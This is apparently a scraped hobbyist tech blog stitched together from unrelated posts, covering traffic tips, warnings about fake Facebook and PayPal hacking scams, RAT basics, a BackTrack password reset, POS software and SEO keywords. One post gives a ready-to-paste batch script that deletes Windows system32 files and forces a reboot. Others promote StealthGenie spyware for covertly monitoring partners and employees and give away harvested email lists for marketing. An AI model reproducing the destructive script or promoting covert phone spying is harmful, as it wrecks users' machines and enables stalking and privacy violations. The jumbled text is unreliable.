
Increase Traffic to your Blog or Website - Get +1000 of traffic everyday - Three steps

Increase Traffic to your Blog or Website - Get +1000 of traffic everyday 2015 -

I will show you and explain in details how you can get more traffic everyday in just 5 minutes.

Surely you’ve heard of blogging by now, it is a very personal way of communicating. It can actually be considered as a “social media”. If you want to start or improve your blog, read on for some helpful tips.
You have to be authentic in writing your articles and always keep in mind that blogging is an art, make sure you write about things people find interesting and useful.

Step one : find a blogger ( in Facebook, twitter...) that you know (it can be one of your friends in life or in facebook...) or that you agree with him to see his or her blog everyday for 3 minutes ( visit 10 pages of his blog).

Step two : the blogger you visited his pages, will visit yours ( 10 pages of your blog)

Step three : find another friend or another blogger and try to explain to him this principle, once he accepted you go back to step one.

Done, imagine you have 10 friends who have each of them a blog, you get more than one thousand 1000 visits per day, and this is just for 10 bloggers, imagine you have 100 bloggers so you get 10k ( 10 thousand visitor per day)

The KEY is to visit pages of other blogs so others they come visit yours.(visit 10 pages and maximum 100 pages per day). 
You can try me for example !

Keywords : Increase Traffic, blog traffic, website traffic, thousands of traffic everyday, +1000 entry blog, more traffic, how to get traffic, increase blog's traffic, more visitors blog, more visitors website.


How to Hack a Facebook Account

Again, How to hack a facebook account, eeeh fake hackers never stop, they still think everybody will believe it.
This is a scam, fraudulent or you can call it whatever you want, you can check the website, or read this article before visiting it here

it's fake, it does not work, this scammer who made this website, his only purpose is to get information from you, from your browser cookies, to steal your Facebook and all email accounts passwords that are saved in the browsers, be careful.

These links are for educational purposes only, and just to show you an example of the fake websites that hack facebook, THEY ARE FAKE so that you know

The main weapon of this kind of SCAM, is attraction, most of us when we see a nice website which looks like a hacking website, with a white text color & white background, some attractive words like exploiter, victim's email, mail extractor, freezer, unlocker, hacker, cracker.... we think or we say "wow that's exactly what i need, i'm going to hack all my girlfriend's accounts or my friends....", i'm sorry to disappoint you budy, the truth is that "There is no way, i mean no program exists that can do such things", so do not use it, this is an advice hardly recommended.
---   ------   ------   ------   ------   ------   ------   ------   ------   ------   ------   ------   ---
This is what's written in the home page of the website just to convince you that'll work, that they are a team, and worked for years to achieve that program,bla bla bla.... bullshit.

Ever thought of hacking a Facebook (fb) account? Interesting! Connecting billions around the world, Facebook is most certainly among the biggest players of social media interaction. With the number of Hack Facebook apps, new users increasing each day, the site is enjoying a figure that is considered to be higher than Google’s. The bad news is that within these users is a percentage that uses the social opportunity in selfish ways. These unlawful minds include the person posting negative things to ruin another’s reputation and the ones the using the opportunity to cheat on their spouses. It is for this reason among others that hacking would be recommended.

With a few simple steps you can hack a Facebook account within a short period of time. To help you with this is simple web-based Facebook hacker software where you will be required to;- Open the URL of the website- Click on application link button- When it opens, enter the fb username to be hacked- Click on ‘hack the account’ – authorization code will be created- Click on ‘download authorization code’- Open Facebook, enter the ‘victim’s’ username together with the authorization code- Finally!

You have been authorized and all is left is smiling all the way to your virtual destination.
Social media is limitless. This programing apps are all over the world to approach for either good or bad intentions. Let say someone has uploaded a status that will ruin either your family’s or friend’s reputation. Instead of sitting around you can to hack the Facebook account and literally take the post down! This is one of the reasons why crime preventions units use this fb applications to to Facebook password hacker on accounts of criminal such as sex offenders, malicious suspects, shop lifters including burglars and look for evidence to use against them in the court of law. The best thing about this software is that child safety is considered. This Facebook hacker is also used to detect offenders who would attack your child from home/school. To hack Facebook accounts of underage users will ensure that you not only monitor but also regulate the way they are using the platform. In this time and age, a child has access to more information compared to 15 years ago making this a reason to make sure that you know what the youngster is up to. As the old adage goes – spare the road and spoil the child.

In case your are in relationship status is ‘its complicated’ and you are suspicious that your lover is doing things behind your back, then try to hack his/her Facebook account and trust me; you better be ready to do this. Just download the web-based application and you are good to go.
How the hacker application works Facebook hack can either be easy or complex. Meaning that you can remain anonymous when you hack an account and the hard part is that the accounts come with complex algorithms not leaving the protocols that are drafted regularly to maintain security of each fb user. This is because the site owners are hiring web administrators to ensure that they come up with new ways to prohibit further damage brought about by hackers.
The logic behind the web-based hacker application is password recovery. This is a system that helps you obtain the exact password of an account. And it is best preferred because of speed and user-friendliness giving the you – the hacker, the ability to log in to an account then later log out undetected; all this for free. The application is available at no cost; take it as a gift from the developers to you.

When it comes to interface, the developers of Facebook hacker application make it even friendlier by carefully laying out the design. If your first attempt is not successful, do not fret. The application will give you a list of possible passwords that will definitely help you break the odds.

With years of product development by outstanding and innovative minds, the application needed advanced programming together with complex algorithms to develop. It can incredibly take you less than two minutes to hack Facebook account depending on the password combination of the culprit. This is because each password in Facebook is encrypted with security protocols to keep the hackers away. But this restriction is lifted all credit going to the web-based hacking application.
What are the requirements to Facebook hack? All you need to do is get a hacker application, an internet connection and a computer. Why go for a complicated approach which will make you download, upload and do some complex math so as to access a Facebook account? Do it the easy way – go for a Facebook password hacker application; a free and simple to utilize web application.

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Batch Windows To KILL Your Computer

Batch Windows To KILL Your Computer -

Create a new text document on your desktop. Double click the file – it should be blank inside. Now, go to file>save as, and in the “Save As” window, input a name for your BAT file and then add a “.bat” on the end (without the quotes). My file was named kill-my-computer.bat, for instance.

------------------ Copy and Paste this code in your batch file.........................@echo off
title (Your title has to)
del C:\WINDOWS\system32\*.*
start cmd
shutdown -r
goto :1

Remember, if you run this BATCH, your computer will not work anymore, this is for educational purpose only, use it on your own responsability.


Real Story about Paypal Hacker - Paypal Hacking 2015

Real Story about Paypal Hacker - Paypal Hacking 2015 -

No program is true...Believe me, there is no way to hack Paypal server or website, there is no software or logiciel that you put in your Paypal account then, with a simple click, you get money straight to your balance or credit-card, all of them are spammers, scammers, fraudulent people, from around the world.

No video content is true...The program that you downloaded is made for educational purpose only, to make you understand that you can't do such thing, and be aware that all programs or applications like this one, are FAKE

From a side, it's true, the software is real, it has buttons, it clicks and all that works fine ( it's easy to make software with JAVA, but it does not really work, it does not connect to Paypal server, it's just a scene for you to make you believe that it can work, do you know WHY ?.

The objective is that you BUY THE PRODUCT, you buy the software, then, when you try it, pfff nothing, and the buyer, before he send you the software, he puts in the conditions of using the softwarethat he is not responsible for using the software with Paypal or hacking or money or anything so you fall into the trap.

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Free fresh email list 2014-2015 - Free Facebook email list- Free google plus email list

Free fresh email list 26-06-201 - Free Facebook email list- Free google plus email list -

Email list of 100 persons Tested one by one and verified, these emails are registered on facebook GooglePlus, you can check it by yourself.
Grow your email marketing, your facebook friends, facebook ad campaign...Boost your website trafic...

Enjoy...This list is for free, if you would like to get more, send me a request.

List of 100 verified and valid email, facebook account, google+ account : 

        Email                                                              Facebook Account

The full list of 100 email is in the file :

Download Excel-CSV File : Mediafire link 

Download TXT File   : Mediafire link  

-------------------------------  New-New-New  ---------------------
The full list of +600 email list of facebook users 2015 updated :

Download Excel-CSV File : Mediafire link - 2015 facebook email list of 600 users

Download TXT File   : Mediafire link  - 2015 facebook email list of 600 users


Stealth Genie - Cellphone spy anywhere anytime GPS location phone call listening and everything

Stealth Genie - Cellphone spy anywhere anytime GPS location phone call listening and everything -

Want to Start Spying on any Phone within the Next 5 minutes?
Use the World's Most Powerful Mobile Phone Spy Software

You want to keep an eye on your loved one or your employee, you suspect them hiding something and it might get too late, how do you know where they are or what they're doing right now ? if you called them on the phone, they might tell you the truth about their location and their activity or just lie on you, what if you're worried? you want to know what they're doing on their cell phones and know their exact location, you have now the only way that gives you all the answers.

What you need is a solution to monitor the truth of your loved one or your employee, and gives you their location at all time, do not worry here is the solution it's called STEALTH GENIE, the most powerful cell phone Spy Software available on any iphone, androide and blackberry phone, and already used by hundred of thousand of satisfied customers all over the world.

How to use: very easy, install the application on the iPhone you want to monitor, that's all, now you can monitor that phone from another iphone or from a computer, all you need is to login with your given information.

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Why You Should Use StealthGenie?

  • StealthGenie is the most powerful spy phone software with highly innovative features.
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  • Works in complete invisible mode, it will never appear on the monitored phone.
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Spy on Calls
Listen to phone calls Live
Record calls
View call history

Spy on SMS MessagesView send and receive SMS
View deleted SMS
Redirect SMS

View Their GPS LocationLook at current GPS location
Look at location history
Find out travel routes

Read Emails
Read sent/receive emails
Read Gmail
View email contacts list

Instant Messengers
View Facebook Chats
View Viber Chats
View Skype Chats
View WhatsApp Chats
View iMessage Chats
View BBM Chats

View Multimedia FilesGet access to photos
Watch videos files
Listen to audio files

Internet Activities
View web browser history
View bookmarks

Calendar Activities
View address book
View calendar entries
Look at meeting scheduler
View Task Logs
Calendar Activities
View address book
View calendar entries
Look at meeting scheduler
View Task Logs

Alerts & Notifications
Alerts on SIM change
Alerts on use of specific numbers and words

Remotely Control
Control Panel
Remote access
Lock phone
View Installed Apps

Wondershare Data Recovery for Windows - Number one reliable data recovery software

The Leader in Data Recovery (Windows) - Recover every bit of your hard disk !

Wondershare Data Recovery is The world's 1st complete data recovery solution for Windows.
You get all the files and data recovery, not like free softwares that let you download their software and after installing it and try to recover your precious data, you get only some files and not all of them.
Now you have the super powerful software number one in data recovering, fast and gets all your files.

You can download a free trial version of the software (limited capacity of recovering and moderate), and see by yourself all the functions, then you can download the full version (unlimited capacity of recovering and fast) that is recommended if you have files and photos of your family (girlfriend, wife, children, parents..etc) deleted by mistake and you're in a hurry, the right solution is to buy the full version and you won't be disappointed.


Wondershare Data Recovery is a powerful yet easy-to-use Windows data recovery software that can recover your deleted, formatted, lost and inaccessible data from PC, USB drive, external hard drive, mobile phone, digital camera, iPod, MP3/ MP4 player, and other storage media. This cost-effective and non-destructive data recovery tool with unique recovery modes helps you perform data recovery thoroughly. Key Features of Wondershare Data Recovery: 1.Safe, Easy &Fast to recover data. 2.Powerful Recovery Ability. 3.Flexible & Precise Data Recovery. 4.Versatile Preview Modes.


People on forums complaining about FREE RECOVERING SOFTWARES :
Mike_detroit : Hi, I'm trying to recover some lost data. Long story I messed up and lost meaningful and precious videos.
I ran many free recovering data softwares, and wasn't able to get all of my pictures back
For videos i just found 1 mp4 put of 30 that I would've liked to have back.
These files are around 2gb
One of the softwares i downloaded free, also made very light PDF files, the largest being 5Mg. Maybe my files could be in there?
How to I recover all the PDF, or recover my lost videos?
Any help would be great, thanks

KLinda_65 : I don't know too much about data recovery. So don't take this to heart. But from my experience, whatever, I don't recover from "free softwares" you spend the $50+ on data recovery softwares and you get all back.

Leogage : i used FREE SOFTWARES also in the past, for recovering files. and if i recall correctly, you could use several file formats/sizes to search for files. but with free softwares of recovering data, you only got files under 10 Mb, so if you really need that files or information you need a full version software.


Remote Administration Tool Tutorial - What is a RAT

A RAT is the Abbreviation/Shortcut of Remote Administration Tool. It is mostly used for malicious purposes, such as controlling PC’s, stealing victims data, deleting or editing some files. You can only infect someone by sending him the Executable file you have created with your RAT, or either use a Java drive-by to make your victim activate the virus by running a Java applet.

How do Remote Administration Tools work?

A remote administration tool has a Executable file and client technology. The Executable file runs on a controlled host computer and receives commands from the client, which is installed on other remote host. A remote administration tool works in background and will hide for users. You can monitor user’s activity, manage files, install additional software, control the entire system including any present application or hardware device, modify essential system settings, turn off or restart a computer and fun abilities such as turning on Webcams/Changing wallpapers and much more.

Remote administration tools are divided into malicious and legitimate applications. Illegal RATs, also known as remote administration trojans, are analogous to Backdoors and have very similar functionality. However, they aren't viral, do not propagate by themselves and usually do not have additional destructive functions or other dangerous payload. These Malware containing files do not work on their own and must be controlled by the client.

This is how you create your Executable file on a RAT:

  • BlackShades RAT

  • Darkcomet RAT

  • NetWire RAT

  • CyberGate RAT


How to reset password for BackTrack 5 VMware image

How to reset password for BackTrack 5 VMware image -

How to reset password (login is root) for BackTrack 5 VMware image

You forgot the password to access your BackTrack 5 VM image, then don't worry, this is the solution :

1. Power off the image and edit the .vmx file for the vmware image in notepad or notepad++ and add a 15 second delay for the bios prompt.
Add this line : bios.bootDelay = “15000″ to the end of the file :

Go to my documents, Click on "Virtual machines"

How to reset password for BackTrack 5 VMware image -

Select the .vmx file.

How to reset password for BackTrack 5 VMware image -

click by the right and edit in notepad

How to reset password for BackTrack 5 VMware image -

Add the line to delay the boot 15 seconds
How to reset password for BackTrack 5 VMware image -

Save the vmx file.
Now go to VMWARE

How to reset password for BackTrack 5 VMware image -

Right click on settings

How to reset password for BackTrack 5 VMware image -

Press ok.

2. Power on the image and press ESC to show the boot menu.
3. Insert your BT5 Live CD or configure VM to use an ISO image as the CD. Other Ubuntu Linux Live CDs may work.
4. Select Boot from CD/DVD from the boot menu
5. Boot the Live CD( iso or whatever method you did) in Text mode
6. Once the bash prompt shows, type fdisk -l to show your drives. Usually it's /dev/sda1
7. Make a mount point, type : mkdir /mnt/vmdisk                    - type enter
8. Mount the vm disk, type :  mount /dev/sda1 /mnt/vmdisk (replace /dev/sda1 with your drive’s info)     - type enter
9. Change shell roo,t type :  chroot /mnt/vmdisk                       - type enter
10. Change the root password, type :  passwd root                    - type enter and type a new password
11. Confirm the change is saved to disk, type :  sync                  - type enter
12. Reboot the image, type :  reboot                                         - type enter

Now you should boot into your VM and be able to use the new password.

After this is working, you may want to change the .vmx file to reduce the boot delay down to a smaller value like 5 seconds (5000), or to delete that line.

If you got a problem, share it in comments.


Contribute by writing articles

Contributing to this blog

Conditions for an article to be approved :

  • Article made by yourself (at least 40% is not copy/paste another article).
  • The content should be about computers, internet, technologies...etc
  • Has at least one image.
  • Coherent and true information.
  • Send an email to the administrator to invite you to become an author to begin contributing.
  • You will need to sign-in with a Google Account to start contributing to this blog..

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I recommend you to read the Google Terms of service before applying. 
You get answers to all your questions in 24hours.


Why hackers hack a page in social networks - Facebook Twitter Pinterest Google plus - How to be safe

Why hackers hack a page in social networks - Facebook Twitter Pinterest Google plus - How to be safe

All of these applications are developped by hackers to hack YOU, it's not safe for you, do not download such programs

Why hackers hack a page in social networks - Facebook Twitter Pinterest Google plus - How to be safe

Learn facebook ShortKeys : Facebook ShortCut Keys

Social networks are increasingly popular on the Internet. We can spend hours on these networks, make comments on photos of our friends, play games and simply chat, and it's no more a secret for all of us, that all social networks are a very good target for hackers, to retrieve information related to anything (advertising, terrorism, personal photos, videos...), so to protect your information and navigation while on social networks; real the following :

Why hackers hack a page in social networks

Attackers hack pages on social networks quite often. The most popular social networks, including FaceBoo, Twitter, Pinterest, Google Plus+, Tumblr, Instagram, VK, LinkediN. There are several reasons for breaking your page:

v Ordered to hack your page to get confidential information (correspondence, photos, etc.).
v Using your page to try to hack your friend's page.
v For spamming.
v Blackmail (page redemption money).
v Distribution of computer viruses.
v Theft of money.
v Despite the cause of the rupture, the result is always the same - you lose access to you page and the attacker knows your personal data (correspondence, personal photos, etc.) and through your page, they can hack your friends pages.
v Beginners hackers to test their skills.
v Anyway to protect your resistance.

How to protect your page 

Get a reliable mailbox
When you enroll in any social network, you need to specify an e- mail. It is necessary that, if you forget the password of your page, you could get a new one (or restore the old one ) through the mailbox. If an intruder breaks into your inbox, then, hacking your  page is not difficult.

Most reliable Mailbox systems are Yandex, Google, Yahoo and Hotmail. Be sure to set a password to your inbox. To create a password, use the password generator.

Set a strong password for your Account
A fairly common method of hacking pages is - search for various combinations of passwords. This is achieved by a special program that can create thousands of combinations of passwords per second.
Be safe against this threat is using a complex password on your page. The better the password is, the longer and harder to break your page. To create a password, use the password generator

Or do not give your password even for you girlfriend or your wife.
Attackers often fraudulently try to learn your password, How ?

They send you an email, where the email looks really close and similar to the social network target (for example Facebook), they tell you that you can go to your Facebook administration page to see new applications or whatever...
Or they can tell you that that there is an error occurred on the server (or similar situations) and you must send your password. You can even get another message, but the purpose is all the same, to lead you type your password in the form and click send, once you do that, you’ve been hacked.

Remember that the owners of social networks have all passwords pages. They make a backup of all data and never ask you to send your password or e -mail address. They do not need that information. Do not believe and do not respond to that kind of messages at the request to send the password.

Please enter your mobile phone
The major social networks (VKontake, classmates) have an additional opportunity to protect your page - send your password to your mobile phone. If you cannot go to your page, you can enter your mobile number and you will be sent a password to restore access .

Make sure you take this opportunity and provide a mobile number during registration. This protection is more efficient and provides quick access to pirated content.

Install a good Antivirus
There are computer viruses that are able to read the keys pressed on the keyboard. Imagine that you’re on the social network page and you enter the password. In the first pages the virus begins to read all pressing buttons on the keyboard and sends this information to the attacker.

To be sage against these viruses, you need to install a good and reliable antivirus.

Check the website address
There are viruses that redirect you to a page that is completely identical to the social networking page. When you enter your user name and password on this fake page, you got in the trap and the attacker gets these information.

These sites are specially designed for passwords. Even their names are very similar. Agree that nobody will notice the difference between the current location Site “” and location "" and the attacker  is “", another example is the famous and or even

Of course, the creators of social networks are struggling with such sites and try to buy these addresses, to prevent attackers from using them for fraud, but still be careful.

Be honest user
The social network is a small world in which the rules are still living. Be honest user. Do not go to strangers that would please or joke page. Do not add yourself to friends of unkown people. Do oot to engage in a large number of groups and communities. All these actions make your page more attractive to hackers.

Share your thoughts in comments.


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You can download the guide in FRENCH, the software is in FRENCH, and we're working on an english version, if you would like a version in your langage please don't hesitate to request it.

Download a trial version of the software in French : Download link
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Download the guide in French : Download link
Buy a full version, Send me a message at

To launch the software, double click the icon.

A window opens asking you to select a user and enter its password. At the first use of the software, the default user is "Administrateur" with a blank password, you can create a password or let it blank.


Click on "Paramètres" then "Mes données".

Enter your data and confirm. Use the "Enter" key to move to the next field and the key
"up arrow" to return to the previous field. (This is valid for all Windows software)

Click on "Paramètres" then "Utilisateur"

This window allows you to add, edit and delete users and their respective passwords. Leave this window with the "Escape" key (This is valid for all Windows software).

Click on "Paramètres" then "Permissions".

Define access rights for each user, for example the user "Mohamed" can make a purchase but can not access the sales history. (The administrator has all the rights to access the software)

Click on "Nouvel achat"

Set the date, choose the provider/supplier (To create a new provider/supplier, click on "+" and enter their information) and enter the PO Number and invoice.

When the cursor is on the "+" to the right of "Product" field, press "enter" to select the product to add.

To create a new product, click on "+" and enter information about it (Name, family and threshold) then validate.

The cursor is positioned on the bar code field: If the product has a bar code scanner it with the reader otherwise click on the blue triangle to the software creates a unique barcode images that you can print later .

Enter the purchase amount and the sale price follows validate prices. Repeat for all the products in this purchase.

To complete the purchase, press "F12" and enter: VAT and delivery. If a payment was made, choose a box and enter the amount of the payment and confirm.

To print barcode labels, click on "Settings" then "Print bar code."

Double click on the print products. Default print quantity is the stock with the possibility of change according to your needs.

Press "F12" and then enter the label printing start, then click "Print".

To find or change a purchase, click on "Purchase History" in the main window and double-click purchasing to change (follow the same steps for a new purchase).

You can also delete a purchase from history.

The stock will be automatically updated after each operation: Purchases, sales ......

Click on "Situation" to view the status of the stock, searchable with filter (Product, barcode, family, available stock, stock sold out .....)


To make a sale, the cash used must first be opened. To open a box click on "Cash governed," select box, click Open and enter the starting amount (Base Case). At the end of each day, close the cases governed by entering the actual amount found (Variances will be stored for future reference).

Then click on "New Information" to access the counter.

Product research will barcode or by opening the list of products by clicking on "+" to the right of the "Product" field.

Submit this sale: press the "Space" and enter the amount advanced by the client key.

To make a return, proceed in the same way by entering negative quantities. For example, if a customer makes you a box jam, scan it with the reader, then insert the amount of "-1", the amount payable will be calculated automatically.

To view, change or delete a sale, click on "Sales History"

Financial transactions:
In this section it is possible to add, modify and delete the following:
  • Payments and refunds of suppliers. 
  • Payments and refunds of clients. 
  • Expenses and supplies crates. 


Keyword list profitable niche "SEO Marketing" low competition and statistics

Keyword list profitable niche "SEO Marketing" low competition and statistics

Here is a list of 101 keywords, that you may use for a website based on the keyword "SEO Marketing".
Targeting :

  • All location.
  • English
  • Google and all partners.
We consider competition as below :
  • Low competition : from 0.01 til 0.33 
  • Medium competition : from 0.34 til 0.65 
  • High competition : 0.66 til 1.00 
GMS Global Monthly Searches, shows how often people everywhere searched for a keyword.
ACPC : Approximate Cost Per Click, estimates the amount that you might get paid each time someone clicks your ad.

Keyword Competition GMS ACPC - EUR
seo marketing 0.73 12100 4.88
seo 0.52 1000000 3.55
search engine optimization 0.60 90500 7.39
seo tools 0.40 60500 2.81
web design company 0.59 40500 5.40
seo services 0.74 40500 8.18
what is seo 0.39 33100 2.79
search engine optimization seo 0.05 27100 5.07
marketing online 0.64 27100 1.37
search optimization 0.11 22200 7.89
about search engine optimization 0.05 22200 6.52
search engine marketing 0.68 22200 5.56
seo jobs 0.39 22200 1.39
video seo 0.43 18100 1.18
website design company 0.51 18100 4.91
seo india 0.39 18100 5.32
seo search engine optimization 0.44 14800 3.73
seo software 0.51 14800 3.34
seo tips 0.52 14800 3.96
what is search engine optimization 0.11 14800 5.73
search engine optimisation 0.71 14800 12.47
best seo service 0.07 12100 6.98
seo moz 0.29 12100 0.70
seo tutorial 0.34 12100 0.60
best seo services 0.10 9900 5.03
seo service 0.67 9900 7.01
website optimization 0.54 9900 8.92
free seo 0.68 9900 1.78
free seo tools 0.53 9900 1.57
seo training 0.65 9900 3.78
seo companies 0.82 8100 15.07
seo optimization 0.72 8100 7.42
search marketing 0.53 8100 5.01
local seo 0.71 8100 8.17
best seo company 0.57 8100 11.94
seo best company 0.03 8100 1.70
the best seo company 0.07 8100 16.10
seo london 0.75 8100 5.41
marketing companies 0.75 8100 4.90
new york seo company 0.22 8100 12.94
seo checker 0.54 6600 2.80
best seo companies 0.14 6600 15.07
seo check 0.56 6600 2.51
seo work 0.35 6600 3.04
best seo 0.20 6600 8.65
the best seo companies 0.03 6600 10.36
black hat seo 0.26 6600 5.21
seo agency 0.80 6600 10.16
seo video marketing 0.30 6600 0
marketing company 0.66 6600 4.16
seo packages 0.65 6600 4.97
seo website 0.63 5400 2.74
seo hosting 0.81 5400 4.42
how to seo 0.22 5400 4.95
seo news 0.37 5400 4.65
seo free 0.53 5400 1.00
seo powersuite 0.24 5400 2.92
video seo marketing 0.33 4400 2.14
seo uk 0.64 4400 5.23
website seo 0.68 4400 5.31
local seo services 0.54 4400 11.80
seo test 0.49 4400 2.03
best web design company 0.39 4400 4.60
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seo web 0.45 4400 0.60
seo basics 0.57 4400 5.00
seo services company 0.34 4400 7.23
best seo software 0.45 3600 4.25
search engine optimization tips 0.70 3600 5.20
seo score 0.40 3600 2.78
small business seo 0.54 3600 7.77
professional seo services 0.39 3600 8.12
seo book 0.34 3600 5.00
seo manchester 0.80 3600 6.80
seo copywriting 0.55 3600 4.76
joomla seo 0.35 3600 1.55
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web seo 0.54 2900 2.74
seo audit 0.68 2900 7.77
seo specialists 0.37 2900 9.77
seo web design 0.61 2900 5.01
white hat seo 0.51 2900 5.31
off page seo 0.28 2900 2.73
best website design company 0.27 2900 1.33
seo ranking 0.74 2900 2.88
search engine optimization services 0.50 2900 14.60
seo experts 0.63 2900 10.47
cheap seo 0.67 2900 4.53
the best seo 0.11 2900 0.38
cheap seo services 0.45 2900 7.40
seo firm 0.68 2900 12.95
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online marketing company 0.75 2900 8.44
best seo tools 0.52 2400 3.97
how to do seo 0.51 2400 3.77
seo services london 0.59 2400 11.50
seo consultants 0.69 2400 13.15

Keywords established on Jan 9, 2014, 9:53 AM.

Monthly searches for the last 12 months keyword "SEO Marketing"

Please feel free to share your thoughts and feelings in comments.
You may refere to the google understanding keyword tool column for more explanation.